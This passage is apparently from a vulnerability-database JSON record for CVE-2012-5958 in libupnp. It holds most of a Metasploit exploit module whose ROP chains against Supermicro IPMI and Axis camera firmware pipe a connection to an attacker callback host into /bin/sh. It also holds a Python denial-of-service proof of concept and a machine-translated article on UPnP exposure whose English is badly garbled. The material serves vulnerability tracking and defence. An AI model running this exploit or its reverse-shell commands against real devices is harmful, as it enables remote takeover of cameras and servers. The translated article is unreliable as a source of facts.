],\n\n [ \"Debug Target\", {\n\n # The callback handles all target-specific settings\n :callback => :target_debug\n\n } ]\n\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2013-01-29'))\n\n register_options(\n [\n Opt::RHOST(),\n Opt::RPORT(1900),\n OptAddress.new('CBHOST', [ false, \"The listener address used for staging the real payload\" ]),\n OptPort.new('CBPORT', [ false, \"The listener port used for staging the real payload\" ])\n ])\n end\n\n\n def exploit\n\n configure_socket\n\n target_info = choose_target\n\n unless self.respond_to?(target_info[:callback])\n print_error(\"Invalid target specified: no callback function defined\")\n return\n end\n\n buffer = self.send(target_info[:callback])\n pkt =\n \"M-SEARCH * HTTP/1.1\\r\\n\" +\n \"Host:239.255.255.250:1900\\r\\n\" +\n \"ST:uuid:schemas:device:\" + buffer + \":end\\r\\n\" +\n \"Man:\\\"ssdp:discover\\\"\\r\\n\" +\n \"MX:3\\r\\n\\r\\n\"\n\n print_status(\"Exploiting #{rhost} with target '#{target_info.name}' with #{pkt.length} bytes to port #{rport}...\")\n\n udp_sock.sendto(pkt, rhost, rport, 0)\n\n 1.upto(5) do\n ::IO.select(nil, nil, nil, 1)\n break if session_created?\n end\n\n # No handler() support right now\n end\n\n\n\n # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc\n def target_supermicro_ipmi_131\n\n # Create a fixed-size buffer for the payload\n buffer = Rex::Text.rand_text_alpha(2000)\n\n # Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char()\n buffer[0,1] = '\"'\n buffer[1999,1] = '\"'\n\n # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise\n cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])\n\n # Start a listener\n start_listener(true)\n\n # Figure out the port we picked\n cbport = self.service.getsockname[2]\n\n # Restart the service and use openssl to stage the real payload\n # Staged because only ~150 bytes of contiguous data are available before mangling\n cmd = \"sleep 1;/bin/upnp_dev & echo; openssl s_client -quiet -host #{cbhost} -port #{cbport}|/bin/sh;exit;#\"\n buffer[432, cmd.length] = cmd\n\n # Adjust $r3 to point from the bottom of the stack back into our buffer\n buffer[304,4] = [0x4009daf8].pack(\"V\") #\n # 0x4009daf8:\tadd\tr3, r3, r4, lsl #2\n # 0x4009dafc:\tldr\tr0, [r3, #512]\t; 0x200\n # 0x4009db00:\tpop\t{r4, r10, pc}\n\n # The offset (right-shifted by 2 ) to our command string above\n buffer[284,4] = [0xfffffe78].pack(\"V\") #\n\n # Copy $r3 into $r0\n buffer[316,4] = [0x400db0ac].pack(\"V\")\n # 0x400db0ac <_IO_wfile_underflow+1184>:\tsub\tr0, r3, #1\n # 0x400db0b0 <_IO_wfile_underflow+1188>:\tpop\t{pc}\t\t; (ldr pc, [sp], #4)\n\n # Move our stack pointer down so as not to corrupt our payload\n buffer[320,4] = [0x400a5568].pack(\"V\")\n # 0x400a5568 <__default_rt_sa_restorer_v2+5448>:\tadd\tsp, sp, #408\t; 0x198\n # 0x400a556c <__default_rt_sa_restorer_v2+5452>:\tpop\t{r4, r5, pc}\n\n # Finally return to system() with $r0 pointing to our string\n buffer[141,4] = [0x400add8c].pack(\"V\")\n\n return buffer\n=begin\n 00008000-00029000 r-xp 00000000 08:01 709233 /bin/upnp_dev\n 00031000-00032000 rwxp 00021000 08:01 709233 /bin/upnp_dev\n 00032000-00055000 rwxp 00000000 00:00 0 [heap]\n 40000000-40015000 r-xp 00000000 08:01 709562 /lib/ld-2.3.5.so\n 40015000-40017000 rwxp 00000000 00:00 0\n 4001c000-4001d000 r-xp 00014000 08:01 709562 /lib/ld-2.3.5.so\n 4001d000-4001e000 rwxp 00015000 08:01 709562 /lib/ld-2.3.5.so\n 4001e000-4002d000 r-xp 00000000 08:01 709535 /lib/libpthread-0.10.so\n 4002d000-40034000 ---p 0000f000 08:01 709535 /lib/libpthread-0.10.so\n 40034000-40035000 r-xp 0000e000 08:01 709535 /lib/libpthread-0.10.so\n 40035000-40036000 rwxp 0000f000 08:01 709535 /lib/libpthread-0.10.so\n 40036000-40078000 rwxp 00000000 00:00 0\n 40078000-40180000 r-xp 00000000 08:01 709620 /lib/libc-2.3.5.so\n 40180000-40182000 r-xp 00108000 08:01 709620 /lib/libc-2.3.5.so\n 40182000-40185000 rwxp 0010a000 08:01 709620 /lib/libc-2.3.5.so\n 40185000-40187000 rwxp 00000000 00:00 0\n bd600000-bd601000 ---p 00000000 00:00 0\n bd601000-bd800000 rwxp 00000000 00:00 0\n bd800000-bd801000 ---p 00000000 00:00 0\n bd801000-bda00000 rwxp 00000000 00:00 0\n bdc00000-bdc01000 ---p 00000000 00:00 0\n bdc01000-bde00000 rwxp 00000000 00:00 0\n be000000-be001000 ---p 00000000 00:00 0\n be001000-be200000 rwxp 00000000 00:00 0\n be941000-be956000 rwxp 00000000 00:00 0 [stack]\n=end\n\n end\n\n # These devices are armv5tejl, run version 1.4.1 of libupnp, have random stacks, but no PIE on libc\n def target_axis_m1011_141\n\n # Create a fixed-size buffer for the payload\n buffer = Rex::Text.rand_text_alpha(2000)\n\n # Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char()\n buffer[0,1] = '\"'\n buffer[1999,1] = '\"'\n\n # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise\n cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])\n\n # Start a listener\n start_listener()\n\n # Figure out the port we picked\n cbport = self.service.getsockname[2]\n\n # Initiate a callback connection\n cmd = \"sleep 1; /usr/bin/nc #{cbhost} #{cbport}|/bin/sh;exit;#\"\n buffer[1, cmd.length] = cmd\n\n # Mask to avoid forbidden bytes, popped into $r4\n buffer[284,4] = [0x0D0D0D0D].pack(\"V\")\n\n # Move $r4 to $r0\n buffer[304,4] = [0x40093848].pack(\"V\")\n #MEMORY:40093848 MOV R0, R4\n #MEMORY:4009384C LDMFD SP!, {R4,PC}\n\n # Masked system() address (0x32FB9D83 + 0x0D0D0D0D = 0x4008AA90), popped into $r4\n buffer[308,4] = [0x32FB9D83].pack(\"V\")\n\n # Set $r0 to system() address : $r0 = $r4 + $r0\n buffer[312,4] = [0x40093844].pack(\"V\")\n #MEMORY:40093844 ADD R4, R4, R0\n #MEMORY:40093848 MOV R0, R4\n #MEMORY:4009384C LDMFD SP!, {R4,PC}\n\n # Move $r0 to $r3 : system() address\n buffer[320,4] = [0x400D65BC].pack(\"V\")\n #MEMORY:400D65BC MOV R3, R0\n #MEMORY:400D65C0 MOV R0, R3\n #MEMORY:400D65C4 ADD SP, SP, #0x10\n #MEMORY:400D65C8 LDMFD SP!, {R4,PC}\n\n # Move $r2 to $r0 : offset to buffer[-1]\n buffer[344,4] = [0x400ADCDC].pack(\"V\")\n #MEMORY:400ADCDC MOV R0, R2\n #MEMORY:400ADCE0 ADD SP, SP, #8\n #MEMORY:400ADCE4 LDMFD SP!, {R4-R8,PC}\n\n # Negative offset to command str($r0 + 0xFFFFFEB2 = buffer[1]), popped into R4\n buffer[356,4] = [0xFFFFFEB2].pack(\"V\")\n\n # Set $r0 to command str offset : $r0 = $r4 + $r0\n buffer[376,4] = [0x40093844].pack(\"V\")\n #MEMORY:40093844 ADD R4, R4, R0\n #MEMORY:40093848 MOV R0, R4\n #MEMORY:4009384C LDMFD SP!, {R4,PC}\n\n # Jump to system() function\n buffer[384,4] = [0x4009FEA4].pack(\"V\")\n #MEMORY:4009FEA4 MOV PC, R3\n\n return buffer\n=begin\n 00008000-0002b000 r-xp 00000000 1f:03 62 /bin/libupnp\n 00032000-00033000 rwxp 00022000 1f:03 62 /bin/libupnp\n 00033000-00055000 rwxp 00000000 00:00 0 [heap]\n 40000000-4001d000 r-xp 00000000 1f:03 235 /lib/ld-2.9.so\n 4001d000-4001f000 rwxp 00000000 00:00 0\n 40024000-40025000 r-xp 0001c000 1f:03 235 /lib/ld-2.9.so\n 40025000-40026000 rwxp 0001d000 1f:03 235 /lib/ld-2.9.so\n 40026000-4002e000 r-xp 00000000 1f:03 262 /lib/libparhand.so\n 4002e000-40035000 ---p 00008000 1f:03 262 /lib/libparhand.so\n 40035000-40036000 rwxp 00007000 1f:03 262 /lib/libparhand.so\n 40036000-4004a000 r-xp 00000000 1f:03 263 /lib/libpthread-2.9.so\n 4004a000-40051000 ---p 00014000 1f:03 263 /lib/libpthread-2.9.so\n 40051000-40052000 r-xp 00013000 1f:03 263 /lib/libpthread-2.9.so\n 40052000-40053000 rwxp 00014000 1f:03 263 /lib/libpthread-2.9.so\n 40053000-40055000 rwxp 00000000 00:00 0\n 40055000-4016c000 r-xp 00000000 1f:03 239 /lib/libc-2.9.so\n 4016c000-40173000 ---p 00117000 1f:03 239 /lib/libc-2.9.so\n 40173000-40175000 r-xp 00116000 1f:03 239 /lib/libc-2.9.so\n 40175000-40176000 rwxp 00118000 1f:03 239 /lib/libc-2.9.so\n 40176000-40179000 rwxp 00000000 00:00 0\n 40179000-4017a000 ---p 00000000 00:00 0\n 4017a000-40979000 rwxp 00000000 00:00 0\n 40979000-4097a000 ---p 00000000 00:00 0\n 4097a000-41179000 rwxp 00000000 00:00 0\n 41179000-4117a000 ---p 00000000 00:00 0\n 4117a000-41979000 rwxp 00000000 00:00 0\n 41979000-4197a000 ---p 00000000 00:00 0\n 4197a000-42179000 rwxp 00000000 00:00 0\n 42179000-4217a000 ---p 00000000 00:00 0\n 4217a000-42979000 rwxp 00000000 00:00 0\n 42979000-4297a000 ---p 00000000 00:00 0\n 4297a000-43179000 rwxp 00000000 00:00 0\n bef4d000-bef62000 rw-p 00000000 00:00 0 [stack]\n=end\n\n end\n\n # Generate a buffer that provides a starting point for exploit development\n def target_debug\n Rex::Text.pattern_create(2000)\n end\n\n def stage_real_payload(cli)\n print_good(\"Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...\")\n cli.put(payload.encoded + \"\\n\")\n end\n\n def start_listener(ssl = false)\n\n comm = datastore['ListenerComm']\n if comm == \"local\"\n comm = ::Rex::Socket::Comm::Local\n else\n comm = nil\n end\n\n self.service = Rex::Socket::TcpServer.create(\n 'LocalPort' => datastore['CBPORT'],\n 'SSL' => ssl,\n 'SSLCert' => datastore['SSLCert'],\n 'Comm' => comm,\n 'Context' =>\n {\n 'Msf' => framework,\n 'MsfExploit' => self,\n })\n\n self.service.on_client_connect_proc = Proc.new { |client|\n stage_real_payload(client)\n }\n\n # Start the listening service\n self.service.start\n end\n\n #\n # Shut down any running services\n #\n def cleanup\n super\n if self.service\n print_status(\"Shutting down payload stager listener...\")\n begin\n self.service.deref if self.service.kind_of?(Rex::Service)\n if self.service.kind_of?(Rex::Socket)\n self.service.close\n self.service.stop\n end\n self.service = nil\n rescue ::Exception\n end\n end\n end\n\n def choose_target\n # If the user specified a target, use that one\n return self.target unless self.target.name =~ /Automatic/\n\n msearch =\n \"M-SEARCH * HTTP/1.1\\r\\n\" +\n \"Host:239.255.255.250:1900\\r\\n\" +\n \"ST:upnp:rootdevice\\r\\n\" +\n \"Man:\\\"ssdp:discover\\\"\\r\\n\" +\n \"MX:3\\r\\n\\r\\n\"\n\n # Fingerprint the service through SSDP\n udp_sock.sendto(msearch, rhost, rport, 0)\n\n res = nil\n 1.upto(5) do\n res,_,_ = udp_sock.recvfrom(65535, 1.0)\n break if res and res =~ /^(Server|Location)/mi\n udp_sock.sendto(msearch, rhost, rport, 0)\n end\n\n self.targets.each do |t|\n return t if t[:fingerprint] and res =~ t[:fingerprint]\n end\n\n if res and res.to_s.length > 0\n print_status(\"No target matches this fingerprint\")\n print_status(\"\")\n res.to_s.split(\"\\n\").each do |line|\n print_status(\" #{line.strip}\")\n end\n print_status(\"\")\n else\n print_status(\"The system #{rhost} did not reply to our M-SEARCH probe\")\n end\n\n fail_with(Failure::NoTarget, \"No compatible target detected\")\n end\n\n # Accessor for our TCP payload stager\n attr_accessor :service\n\n # We need an unconnected socket because SSDP replies often come\n # from a different sent port than the one we sent to. This also\n # breaks the standard UDP mixin.\n def configure_socket\n self.udp_sock = Rex::Socket::Udp.create({\n 'Context' => { 'Msf' => framework, 'MsfExploit' => self }\n })\n add_socket(self.udp_sock)\n end\n\n #\n # Required since we aren't using the normal mixins\n #\n\n def rhost\n datastore['RHOST']\n end\n\n def rport\n datastore['RPORT']\n end\n\n # Accessor for our UDP socket\n attr_accessor :udp_sock\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb"}], "packetstorm": [{"lastseen": "2020-11-28T17:52:51", "description": "", "published": "2020-11-26T00:00:00", "type": "packetstorm", "title": "libupnp 1.6.18 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5958"], "modified": "2020-11-26T00:00:00", "id": "PACKETSTORM:160242", "href": "https://packetstormsecurity.com/files/160242/libupnp-1.6.18-Denial-Of-Service.html", "sourceData": "`# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS) \n# Date: 2020-08-20 \n# Exploit Author: Patrik Lantz \n# Vendor Homepage: https://pupnp.sourceforge.io/ \n# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download \n# Version: <= 1.6.6 \n# Tested on: Linux \n# CVE : CVE-2012-5958 \n \nimport socket \n \npayload = \"M-SEARCH * HTTP/1.1\\r\\nHOST: 239.255.255.250:1900\\r\\nST:uuid:schemas:device:\" \npayload += \"A\"*324 + \"BBBB\" \npayload += \":urn:\\r\\nMX:2\\r\\nMAN:\\\"ssdp:discover\\\"\\r\\n\\r\\n\" \n \nbyte_message = bytes(payload) \ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \ns.sendto(byte_message, (\"239.255.255.250\", 1900)) \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/160242/libupnp1618-dos.txt"}], "myhack58": [{"lastseen": "2019-03-28T22:38:03", "bulletinFamily": "info", "cvelist": ["CVE-2013-0229", "CVE-2013-0230", "CVE-2007-1204", "CVE-2017-1000494", "CVE-2012-5958", "CVE-2014-8361"], "description": "Earlier this year, Chromecast streaming dongle, Google Home devices and smart TV users are forced to harvest a strip from the youtube PewDiePie channel promotion information. This hijacking is said by the tube top traffic UP the main are a fan of the battle for the thrown. Reported that hackers exploit the improperly configured router, these routers enable the universal plug and play(Universal Plug \u2013 and \u2013 Play, abbreviated UPnP)service, resulting in the router the public port to the private device and the public Internet open. \nMany devices such as cameras, printers and routers, use the UPnP Protocol, so that it can automatically find and check local other devices on the network, and can communicate with each other to share data or stream media. But it brings convenience, but also brings security risks, such as from attacker-controlled devices to bypass the firewall protection, etc., to name a few. \nIn the above event, we investigated a home network with UPnP-related events, found that many users of the device still using the UPnP Protocol. \n\n! [](/Article/UploadPic/2019-3/20193292294895.jpg) \nTable 1. Enabled UPnP for major equipment types \nThis year 1 month, we detected 76 per cent of the router to enable the UPnP Protocol, and 27% of media equipment such as DVD player and media streaming device is also enabled UPnP. Once the UPnP vulnerability be exploited by attackers, a router or other device easily becomes the agent, and then become confused botnets, distributed denial of service attacks([DDoS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>))or spam campaigns the source, and let people almost can't track malicious activity implementation. Previously there have been such cases, the use of a router UPnP Protocol vulnerabilities so that it is forced to connect to Port, send spam or other malicious messages. \nIoT botnet Satori was due to the use of the UPnP vulnerabilities and the infamous. The vulnerability, CVE-2014-8361 is a Realtek SDK miniigd UPnP SOAP interface command injection vulnerability. 2015 5 months, and this vulnerability is related to the announcement and provided the appropriate mitigation measures, but according to our collection of the latest data, many devices are still using older, possibly vulnerable UPnP version. \n\n! [](/Article/UploadPic/2019-3/20193292295992. png) \nFigure 1. Shodan for UPnP detection of the relevant results of the 2019 \u5e74 3 \u6708 5 data \nOnline search engine Shodan can be presented worldwide using the UPnP Protocol, the device number and distribution. In the scan UPnP uses the standard port 1900, we retrieved the 1,649,719. The following table lists some of the well-known UPnP libraries, MiniUPnPd and Custom\uff08Broadcom UPnP library is the most search equipment used. \n! [](/Article/UploadPic/2019-3/20193292297936.jpg) \nTable 2. Shodan display the results in the first three UPnP library 2019 3 month 5 day data \nUPnP related vulnerabilities and the home network device status \nThrough our own Scan tool, we studied the family and other small-scale network environment using UPnP library, and to determine the possible cause the device to the vulnerable factors. In short, we found that most devices still use the older version of the UPnP library, and these UPnP library in the presence of many vulnerabilities have been published for many years. \nMiniUPnPd \nOur IOT scan tool data display, enable UPnP devices 16% use a MiniUPnPd library. MiniUPnPd is a well-known UPnP daemon for NAT\uff08Network Address Translation a router providing port mapping Protocol services. Interestingly, we detected installed older versions of MiniUPnPd device, with 24%in the use MiniUPnPd 1.0, 30% in the use MiniUPnPd 1.6, only 5%of the equipment used MiniUPnPd 2. x version(miniupnpd 2.1 is the latest version). \n! [](/Article/UploadPic/2019-3/20193292298107.jpg) \nTable 3. MiniUPnPd each version using the ratio of \nHaving the older version of Daemon equipment must be updated, in order to put an end to some of the known high-risk vulnerabilities. For example, CVE-2013-0230 is the MiniUPnPd version 1.0 of the ExecuteSoapAction in a stack-based buffer overflow vulnerability that allows an attacker to execute arbitrary code; CVE-2013-0229 is MiniUPnPd 1.4 before a ProcessSSDPRequest a function of the vulnerability, which allows an attacker through a request to trigger a buffer over-read to cause a denial of Service(DoS); the CVE-2017-1000494 is MiniUPnPd version 2.0 prior to an uninitialized stack variable vulnerability, which allows attackers to initiate a DoS attack(segmentation fault and memory damage). \nWindows UPnP server \nWe also found that 18% of the devices using a Windows-based UPnP. These devices, especially the Microsoft Windows XP computer, Windows NT 5.1, you should check whether you have applied MS07-019 patch. (But Windows XP in 2014 4 months have come to an end, which means that it is no longer under Microsoft support, security issues will also be resolved.) Windows XP comes with UPnP functionality is available out of the box, and the patch can solve the UPnP memory corruption vulnerability CVE-2007-1204, and this vulnerability allows a remote attacker on the local service account context to run arbitrary code. \nLibupnp is used in UPnP device of the portable SDK \nFor the UPnP Device SDK portable software development kit libupnp is another well-known UPnP library, it can support a variety of[OS](<http://www.myhack58.com/Article/48/Article_048_1.htm>a). According to our data, the detection device there is a 5% in the use of the libupnp library package, although not a large proportion, but we note that having the library's equipment is mostly 1. 6. 18 / 1.6.19 version before the current version is 1. 8. 4 in. And in 1. 6. 18 a previous version, unique_service_name function in the presence of a stack-based buffer overflow vulnerability, CVE-2012-5958, which allows remote attack via the User Datagram Protocol\uff08UDP data packet to execute arbitrary code. \nConclusions \nFor the user, to determine whether the device has the UPnP related vulnerabilities or whether they are infection is very tricky. Some devices may be hidden in the behind a NAT, so that even if the vulnerability exists, the user will not immediately see the risk. In order to prevent the use of UPnP related vulnerabilities, users should ensure that their device updates. If you suspect the device is infected, you should restart the device, reset it to original factory settings, or to prudence, which was all replaced. Unless network need the device enabled UPnP function, otherwise the best in the device allows the case of the disabled. However, it is noted that, turn off UPnP might also be associated disable some of the features, including the local device dependency, or the need to ignore a request from the device to. \nHome users can also follow these measures to increase security: \n1, use the trend of the home network HouseCal tool scans the home network, and check which devices UPnP port 1900 is open. \n2, go to the device setup page for example the router's settings page to disable UPnP. \n3, according to the need to manually configure port forwarding settings. \n\n", "edition": 1, "modified": "2019-03-29T00:00:00", "published": "2019-03-29T00:00:00", "id": "MYHACK58:62201993392", "href": "http://www.myhack58.com/Article/html/3/62/2019/93392.htm", "title": "Next from the printer coming out will be?-- The theory of the UPnP using the status quo and risk-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}